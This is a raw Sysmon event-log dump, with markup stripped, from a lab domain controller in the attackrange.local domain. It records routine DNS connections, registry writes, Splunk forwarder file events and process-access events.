AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56724- 354300x80000000000000003793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.273{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56470- 354300x80000000000000003792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.272{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local57214- 354300x80000000000000003791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.271{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local65162- 354300x80000000000000003790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.270{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local62710- 354300x80000000000000003789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.270{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55665- 354300x80000000000000003788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.269{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60940- 354300x80000000000000003787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.267{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local60221- 354300x80000000000000003786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.266{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local56505- 354300x80000000000000003785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.264{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local61444- 354300x80000000000000003784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.264{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local59124- 354300x80000000000000003783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.262{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local54370- 354300x80000000000000003782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.262{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55286- 354300x80000000000000003781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.261{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59747- 354300x80000000000000003780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.260{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57757- 354300x80000000000000003779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.259{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local61167- 354300x80000000000000003778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.259{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55984- 354300x80000000000000003777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.258{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62115- 354300x80000000000000003776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.258{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64464- 354300x80000000000000003775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.257{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local61893- 354300x80000000000000003774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.256{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63365- 354300x80000000000000003773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.254{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58171- 354300x80000000000000003772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.253{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local65363- 354300x80000000000000003771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.253{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63279- 354300x80000000000000003770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.251{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62087- 354300x80000000000000003769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.249{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local65500- 354300x80000000000000003768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.249{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local65332- 354300x80000000000000003767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.248{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local63502- 354300x80000000000000003766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.247{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local60008- 23542300x80000000000000003765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:06.392{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5358D20AF61EBAEC1122E87FE7462E39,SHA256=6E05480E33BB7A217D1131B6E3D190AF37A09D2A7267810055FB92E6FBD63197,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000003764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:06.251{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000393) 354300x80000000000000003763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.240{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-892.attackrange.local123ntpfalse51.105.208.173-123ntp 354300x80000000000000003762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.239{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57473- 354300x80000000000000003761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.238{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61359- 354300x80000000000000003760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.238{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63878- 23542300x80000000000000003759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:06.095{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9AC1A99A189C9C765785FB643D391BCC,SHA256=DAEDCB6F931D74BC6AAC1557DADB7D19F2CD367D82BE4AB05BA138521CBE0A59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:06.095{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=607328EE21068BA303880E6D9E3E5947,SHA256=CF1545E540B9B2DD354B46442D605EF9378F735F0B896EFCEC186BA2803E36F0,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000003814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:07.964{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 13241300x80000000000000003813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:07.964{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 13241300x80000000000000003812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:07.964{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 13241300x80000000000000003811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:07.964{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 23542300x80000000000000003810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:07.637{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08CAB99AD6E29D1510BD584183ED1DB4,SHA256=D5658D817282ABD825C9B89F7D848C83F8FE325B91906A95B5ADA8410D059DC7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.287{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local63986- 354300x80000000000000003808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.284{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local54451- 354300x80000000000000003807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.283{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62797- 354300x80000000000000003806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.282{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60500- 354300x80000000000000003805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.280{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64936- 354300x80000000000000003804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.279{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local55237- 13241300x80000000000000003834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.991{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000394) 23542300x80000000000000003833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.867{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4AC4105633F99F1F4F9BB1152683C57,SHA256=896523636D45E2E2D55CB13ECFE4CF84FF9D4F6B6808314B254CDCEF50F7DD5C,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000003832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000003831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000003830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000003829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000002) 13241300x80000000000000003828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000003827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000003826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000003825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000003824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000003823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000003822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000003821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-892 10341000x80000000000000003820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.244{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x80000000000000003819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:08.244{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 354300x80000000000000003818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.746{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local59151- 354300x80000000000000003817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:05.746{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local60976- 23542300x80000000000000003816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.026{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnsMD5=2313D5E228884E38771C53923B0754D9,SHA256=E529C5BC81C8B303489DDB297E5CD96210622B68E3CF428B20DFC94D02FEDB1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.026{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnbMD5=A9A4FAF5A3E25EF77F35D927530EF9BA,SHA256=35323F1BAD6DBDAB187D1143D8E1A3489E6635A09DFC78BC2244B12927865591,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000004089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.972{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7265C7E3DC453092E1A34C0C03CCAFFC,SHA256=D6C9310BEA55584C40ED8F631536EF6FDCEB344DE950E8121EBA97FABC7A2A0D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.925{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 